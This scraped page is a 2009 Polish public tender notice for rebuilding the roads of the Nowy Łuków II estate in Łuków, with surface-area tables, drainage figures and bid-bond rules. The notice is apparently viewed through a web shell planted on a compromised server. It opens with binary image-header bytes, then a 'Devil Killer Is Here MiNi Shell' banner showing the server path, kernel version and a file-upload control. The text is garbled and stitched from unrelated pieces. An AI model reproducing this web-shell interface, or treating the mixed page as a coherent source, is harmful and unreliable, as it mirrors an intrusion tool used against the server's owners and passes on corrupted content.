JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/136169-N-2009.html

<p class="kh_header"><b>Łuków: Przebudowa infrastruktury drogowej osiedla Nowy Łuków II w m. Łuków.</b><br>
<b>Numer ogłoszenia: 136169 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łuków , ul. Piłsudskiego 17, 21-400 Łuków, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukow.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa infrastruktury drogowej osiedla Nowy Łuków II w m. Łuków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa infrastruktury drogowej osiedla Nowy Łuków II 
w miejscowości Łuków , w skład, której wchodzą następujące ulice: Telimeny, Pana Tadeusza, Hrabiego Horeszki, Nowogródek, Goplany, Rolnicza, Gerwazego, Grażyny wraz z łącznikiem 
do ul. Pana Tadeusza, Filomatów, Filaretów wraz z łącznikiem do ul. Maryli Wereszczakówny 
i łącznikiem do ul. Konrada Wallenroda, Konrada Wallenroda, Jankiela wraz z łącznikiem do ul. Konrada Wallenroda, Jacka Soplicy wraz z łącznikiem do ul. Pana Tadeusza, Wojskiego wraz z łącznikiem do ul. Konrada Wallenroda, oraz łącznikiem do ul. Maryli Wereszczakówny, Cegielniana, Południowa, Maryli Wereszczakówny wraz z łącznikiem do ul. Nowogródek.
                Zestawienie powierzchni objętej opracowaniem                               78 091,12 m2                                         
                w tym:
1. ul. Telimeny o długości 304,10m, w tym:                                        4 875,23 m2
- nawierzchnia bitumiczna jezdni                                                            1 913,00 m2
- nawierzchnia z kostki bruk gr. 8 cm/ciąg pieszo-jezdny/                     1 054,00 m2
- nawierzchnia chodników z kostki brukowej 6cm                                 1 034,00 m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                          327,30 m2
- powierzchnia krawężnika 15x30                                                              102,15 m2
- powierzchnia obrzeża betonowego 6x20                                                   31,56 m2
- powierzchnia obrzeża trawnikowego 8x30                                                10,22 m2
- trawnik                                                                                                      403,00 m2
2. ul. Pana Tadeusza o długości 1026,40m, w tym:                          19 080,28 m2
- nawierzchnia jezdni                                                                              6 691,00 m2
- nawierzchnia chodników z kostki brukowej betonowej gr. 6 cm         2 186,00 m2
- chodnik wraz ze ścieżką rowerową z kostki brukowej bet. gr. 6 cm    3 296,00 m2
- zjazdy na posesje z kostki brukowej betonowej gr. 8 cm                     1 578,00 m2
           - powierzchnia krawężnika 15x30                                                                315,00 m2                                          - powierzchnia obrzeża betonowego 6x20                                                  116,04 m2
- powierzchnia obrzeża trawnikowego 8x30                                              218,24 m2                              - trawnik                                                                                                  4 680,00 m2
3. ul. Hrabiego Horeszki o długości 358,38m, w tym:                        3 735,20 m2
- nawierzchnia bitumiczna jezdni                                                            2 200,28 m2
- nawierzchnia chodników z kostki brukowej 6cm                                    786,00 m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                          246,00 m2
- powierzchnia krawężnika 15x30                                                             109,00 m2
- powierzchnia obrzeża trawnikowego                                                        43,92 m2
- trawnik                                                                                                     350,00 m2
               
                 4. ul. Nowogródek o długości                                                                1014,32m
                    -łącznik do ul. Konrada Wallenroda o długości                                  65,00 m
                                                                                    w tym:                              15 776,40  m2
- nawierzchnia bitumiczna jezdni                                                          6 127,80  m2
- nawierzchnia chodników z kostki brukowej 6cm                               3 515,00  m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                     1 521,92  m2
- powierzchnia krawężnika 15x30                                                            310,15  m2
- powierzchnia obrzeża betonowego 6x20                                                 210,90 m2
- powierzchnia obrzeża betonowego 8x30                                                   63,63 m2    
- trawnik                                                                                                  3 832,00 m2
- łącznik z ul. Konrada Wallenroda z kostki brukowej
  betonowej gr. 6 cm                                                                                   184,60 m2
- powierzchnia obrzeża betonowego 8x30                                                   10,40 m2

5. ul. Goplany o długości 65,00m, w tym:                                              741,60 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                              507,00 m2
-zjazdy z kostki brukowej betonowej gr. 8 cm                                            35,20 m2
- powierzchnia krawężnika 15x22                                                               26,55 m2
- obrzeże betonowe gr. 8 cm                                                                          2,85 m2 
- trawnik                                                                                                     170,00 m2
  6. ul. Rolnicza o długości 393,90m, w tym:                                        4 173,77 m2
- nawierzchnia bitumiczna jezdni                                                             2 392,00 m2
- nawierzchnia chodników z kostki brukowej 6cm                                     661,00 m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                           230,27 m2
- powierzchnia krawężnika 15x30                                                              113,55 m2 
- powierzchnia obrzeża betonowego 8x30                                                   13,11 m2   
- powierzchnia obrzeża betonowego 6x20                                                   18,84 m2    
- pobocze gruntowe                                                                                     745,00 m2
7. ul. Gerwazego o długości 58,15m, w tym:                                         685,00 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                              450,00 m2
- zjazdy z kostki brukowej betonowej gr 8 cm                                            37,20 m2
- powierzchnia krawężnika 15x22                                                               23,55 m2
- obrzeże betonowe 8x30                                                                               3,25 m2
- trawnik                                                                                                     171,00 m2
8. ul. Grażyny o długości                                                                             78,10m
- łącznik do ul. Pana Tadeusza o długości                                                  51,00m
                                                          w tym:                                           1 329,22 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                               742,00 m2
- zjazdy z kostki brukowej betonowej gr. 8 cm                                           29,80 m2   
- powierzchnia krawężnika 15x22                                                               37,65 m2
- obrzeże betonowe 8x30                                                                               2,27 m2    
- trawnik                                                                                                     360,00 m2
- łącznik do ul. Pana Tadeusza z kostki brukowej bet. gr. 6 cm                149,10 m2                                                  
- powierzchnia obrzeża betonowego 8x30                                                    8,40 m2
9. ul. Filomatów o długości 147,25+183,00=330,25m, w tym:           3 192,95 m2
- nawierzchnia bitumiczna jezdni                                                           1 145,00 m2
- nawierzchnia chodników z kostki brukowej 6cm                                   860,00 m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                         352,60 m2
- powierzchnia krawężnika 15x30                                                               60,15 m2
- powierzchnia obrzeża betonowego 6x20                                                  60,90 m2
- powierzchnia obrzeża betonowego  8x30                                                 16,30 m2
- trawnik                                                                                                     698,00 m2
10. ul. Filaretów o długości 82,30+125,50m                                           207,80m      
-    łącznik do ul. Konrada Wallenroda o długości                                 29,00 m
-    łącznik do ul. Maryli Wereszczakówny o długości                           54,50m
                              w tym:                                                                       2 535,21 m2                 
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                            1 509,00 m2
- powierzchnia krawężnika 15x22                                                               75,15 m2
-zjazdy z kostki brukowej betonowej gr 8 cm                                           127,02 m2
-obrzeże betonowe 8x30                                                                              10,32 m2   
- trawnik                                                                                                     566,00 m2
- łącznik do ul. Maryli Wereszczakówny z kostki brukowej 
  betonowej gr. 6 cm                                                                                   154,78 m2
- powierzchnia obrzeża betonowego 8x30                                                     8,72 m2
- łącznik do ul. Konrada Wallenroda z kostki brukowej
  betonowej gr. 6cm                                                                                      79,46 m2
- powierzchnia obrzeża betonowego 8x30                                                     4,76 m2
11. ul. Konrada Wallenroda o długości 475,80m   w tym:                2 318,24 m2
- chodnik z kostki brukowej betonowej gr. 6 cm                                    1 055,00 m2
- powierzchnia obrzeża betonowego 6x20                                                   82,62 m2
- powierzchnia obrzeża betonowego 8x30                                                   10,65 m2
- zjazdy z kostki brukowej betonowej gr. 8 cm                                          215,97 m2
- trawnik                                                                                                      954,00 m2

12. ul. Jankiela o długości                                                                        112,50 m
 -    łącznik do ul. Konrada Wallenroda o długości                                 49,00 m
                                                             w tym:                                        1 370,64 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                              763,40  m2
- powierzchnia krawężnika 15x22                                                              40,35   m2 
- zjazdy z kostki brukowej betonowej gr 8 cm                                            68,70  m2
-obrzeże betonowe 8x30                                                                                6,25  m2
- trawnik                                                                                                     334,00  m2
- łącznik do ul. Konrada Wallenroda z kostki brukowej
  betonowej gr. 6cm                                                                                   150,10  m2

- powierzchnia obrzeża betonowego 8x30                                                   7,84   m2
13. ul. Jacka Soplicy o długości                                                             124,00 m
-	łącznik do ul. Pana Tadeusza o długości                                          51,35 m
                                                                                  w tym:                 1 577,87 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                             884,00 m2
- powierzchnia krawężnika 15x22                                                              45,00 m2
- zjazdy z kostki brukowej betonowej gr, 8cm                                           70,60 m2
- obrzeże betonowe 8x30                                                                              4,17 m2
- trawnik                                                                                                     378,00 m2
- łącznik do ul. Pana Tadeusza z kostki  
  brukowej betonowej gr. 6cm                                                                    186,26 m2
- powierzchnia obrzeża betonowego 8x30                                                     9,84 m2
14. ul. Wojskiego o długości 112,25+116,34                                           228,59 m
-	łącznik do ul. Konrada Wallenroda o długości                                 49,00 m
-	łącznik do ul. Maryli Wereszczakówny o długości                           60,00 m
                                 w tym:                                                                    2 821,47 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                           1 586,40 m2
- powierzchnia krawężnika 15x22                                                               81,60 m2 
- zjazdy z koski brukowej betonowej gr. 8 cm                                          173,60 m2
- obrzeże betonowe 8x30                                                                             13,87 m2
- trawnik                                                                                                     645,00 m2
- łącznik do ul. Konrada Wallenroda z kostki brukowej
  betonowej gr. 6cm                                                                                    133,00 m2
- powierzchnia obrzeża betonowego 8x30                                                     8,00 m2
- łącznik do ul. Maryli Wereszczakówny z kostki brukowej
  betonowej gr. 6 cm                                                                                   170,40 m2
- powierzchnia obrzeża betonowego 8x30                                                     9,60 m2   
15. ul. Cegielniana o długości 663,40m, w tym:                                11 063,04 m2
- nawierzchnia bitumiczna jezdni                                                           4 032,40 m2
- nawierzchnia chodników z kostki brukowej 6 cm                                1 271,00 m2
- chodnik wraz ze ścieżką rowerową z kostki brukowej bet. gr. 6 cm    1 665,00 m2
- obrzeże betonowe 8x30                                                                             69,28 m2
- zjazdy na posesje z kostki brukowej gr. 8 cm                                       1 562,30 m2
- powierzchnia obrzeża betonowego 8x30                                                   48,90 m2
- powierzchnia krawężnika 15x30                                                             201,00 m2
- powierzchnia obrzeża trawnikowego 6x20                                               41,16 m2
- trawnik                                                                                                  2 172,00 m2
16. ul. Południowa o długości 382,60m, w tym:                                 2 017,30  m2
- nawierzchnia bitumiczna jezdni                                                          1 430,50  m2
- powierzchnia krawężnika 15x22                                                              34,80  m2
- trawnik                                                                                                    552,00  m2
 
17. ul. Maryli Wereszczakówny o długości                                           59,20 m
-łącznik do ul. Nowogródek o długości                                                  52,30m
                                                        w tym:                                             797,79 m2
- nawierzchnia z kostki brukowej betonowej gr. 8 cm                             458,00 m2
- powierzchnia krawężnika 15x22                                                             24,30 m2 
- zjazdy z kostki brukowej gr 8 cm                                                            22,45 m2  
- obrzeże betonowe 8x30                                                                             1,48 m2
- trawnik                                                                                                   178,00 m2
- łącznik do ul. Nowogródek z kostki brukowej betonowej gr. 6cm       105,10 m2            
- powierzchnia obrzeża betonowego 8x30                                                  8,46 m2
            Długość projektowanych ulic wynosi: 
                                                                                5882,49m + łączniki 461,15m = 6 343,64 m       
            Długość ścieżki rowerowej dwukierunkowej wynosi:
    1026,40+ 581,85m =1 608,25 m
            Długość kanalizacji deszczowej wg zestawienia jak niżej:
            - z rur PVC  fi 315                                                                                         3 092,50 m 
            - z rur PVC fi 400                                                                                             176,50 m
            - przykanaliki z rur PVC- fi 160                                                                     435,00 m
                    Ulica 
Zadanie	Kanał
PVC
O400mm
mb	Kanał
PVC
O 315mm 

mb
	Przykanal
PVC
O160mm

mb
	Studnia rew
z tworzyw
O 1000mm
kpl	Studnia
inspekcyjna
 O400mm
kpl	Wpust
ul. na
studz
O1000mm
kpl	Wpust  ul.
na studz.
O  400mm
pl
Pana Tadeusza	176,5	199,0	88,0	10	5	6	26
Nowogródek	 	1021,5	129,0	18	6	1	37
Cegielniana	 	622,0	72,0	 	9	11	13
Południowa	 	384,0	27,0	5	6	 	10
Rolnicza	 	400,0	38,0	3	9	 	14
Telimeny	 	297,0	44,0	5	5	 	15
Filomatów	 	 	27,0	1	 	 	4
Filaretów	 	121,0	4,0	1	1	 	1
Wereszczakówny	 	48,0	6,0	1	1	 	2
ŁĄCZNIE	176,5	3092,5	435,0	44	42	18	122
Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych. Roboty muszą być wykonane zgodnie z obowiązującymi przepisami, normami oraz ustalonymi w specyfikacji warunkami..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.11.10.00-8, 45.23.21.30-2, 45.23.00.00-9, 45.23.31.20-6, 45.23.32.00-1, 45.23.33.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium w kwocie 170 000 zł (słownie: sto siedemdziesiąt tysięcy złotych) przed upływem terminu składania ofert w jednej z form określonych w art. 45 ust. 6 Pzp, czyli w: 
1)	pieniądzu; 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr  109, poz 1158, z późn. zm.). 
2.	W przypadku wnoszenia wadium w pieniądzu wykonawca wpłaca je przelewem na rachunek bankowy BANK SPÓŁDZIELCZY W TRZEBIESZOWIE 
O. ŁUKÓW nr 26 9206 1048 7103 0300 2000 0040 z dopiskiem wadium - Przebudowa infrastruktury drogowej osiedla Nowy Łuków II w m. Łuków.  O wniesieniu wadium w terminie decyduje data wpływu środków finansowych na rachunek zamawiającego.
2.1.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwa?rancja powinna być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwa?rancji) oraz wskazanie ich siedzib i daty zawarcia umowy,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
3)	kwotę gwarancji,
4)	termin ważności gwarancji,
5)	nieodwołalne i bezwarunkowe zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie
Wykonawcy,
-w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2.1.1	postanowienia ust. 2.1. stosuje się również do poręczeń, określonych w ust. 1 pkt 2 i 5.       
3.	Zamawiający postuluje załączenie do oferty potwierdzonej kopii dokumentu stwierdzającego dokonanie przelewu na rachunek bankowy zamawiającego. 
4.	W przypadku wniesienia wadium w innej formie wykonawca załącza do oferty kopię dokumentu stwierdzającego wniesienie wadium i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia opakowania oferty. 
5.	Termin wniesienia wadium upływa dnia 10.09.2009 o godz. 11:00
6. Wadium wnoszone w formie niepieniężnej powinno zachować ważność od dnia 10.09.2009 do dnia 09.10.2009 r.
7. Zamawiający zwraca niezwłocznie wadium, jeżeli:
1) upłynął termin związania ofertą;
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy;
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy:
1) który wycofał ofertę przed upływem terminu składania ofert;
2) który został wykluczony z postępowania;
3) którego oferta została odrzucona
9. zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust. 8 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
11. Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie,       o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału                        w postępowaniu określone w art. 22 ust. 1 i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3 Pzp.               W szczególności zamawiający wymaga, aby wykonawcy wykazali, że: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
a)	wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedną       robotę budowlaną odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości - wartość robót nie może być mniejsza niż: 9 000 000,00 PLN brutto , oraz daty i miejsca wykonania. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru, itp.),
b)	wskażą  osoby, którymi dysponują lub będą dysponować i które będą uczestniczyć  w wykonywaniu zamówienia posiadające następujące wykształcenie, doświadczenie i kwalifikacje zawodowe, a także zakres wykonywanych przez nie czynności:
                   -         kierowania robotami w specjalności konstrukcyjno-inżynieryjnej w zakresie dróg 
                              i nawierzchni - co najmniej 1 osoba, wykształcenie minimum średnie, doświadczenie 5 lat
-	kierowania robotami w geodezji i kartografii - co najmniej 1 osoba, wykształcenie minimum średnie, doświadczenie 5 lat
c)	osoby, które będą uczestniczyć w wykonaniu zamówie?nia posiadają odpowiednio następujące uprawnienia
                   -      Kierownik robót drogowych - uprawnienia w specjalności konstrukcyjno-inżynieryjnej 
                          w zakresie dróg  i nawierzchni;
  -    Geodeta - uprawnienia w geodezji i kartografii, w zakresie geodezyjne pomiary sytuacyjno-
        wysokościowe  realizacyjne  i inwentaryzacyjne.
3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
a )    a zwłaszcza wykażą, że bank lub spółdzielcza kasa oszczędno?ścio?wo-kredytowa, w których wykonawcy posiadają rachunek, potwierdza wysokość posiadanych środków finansowych wykonawców lub zdolność kredytową wy?konawców na łączną kwotę co najmniej 
        3 000 000,00 zł; 
b)  posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Oddział 2. Opis sposobu dokonywania oceny spełniania tych warunków 
1.	Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli wykonawca złoży wraz z ofertą wszystkie dokumenty wskazane w oddziale 3, wykazujące spełnienie wymagań tam wskazanych. Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Pzp. 
2.	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia lub dokumenty lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia             w wyznaczonym terminie. 
3.	Zamawiający zaniecha wzywania wykonawcy do uzupełnień, o których mowa w ust. 2, jeżeli mimo ich złożenia oferta wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania. 
4.	Oświadczenia i dokumenty składane na wezwanie zamawiającego muszą potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert (art. 26 ust. 3 Pzp). 
5.   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, jednak każdy z wykonawców musi  załączyć
       do oferty dokumenty, o których mowa w oddziale 3 ust. 1 pkt 1,2,3,4 i 6, a wszyscy wykonawcy razem załączają do
      oferty dokumenty, o których mowa w oddziale 3 ust. 2 i 3. Dokument, o którym mowa w oddziale 3 ust 1 pkt 5
       podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum. Ponadto wykonawcy
      wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich 
      w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie
      zamówienia publicznego. Jeżeli oferta wykonawców, wspólnie ubiegających się o udzielenie zamówienia, zostanie
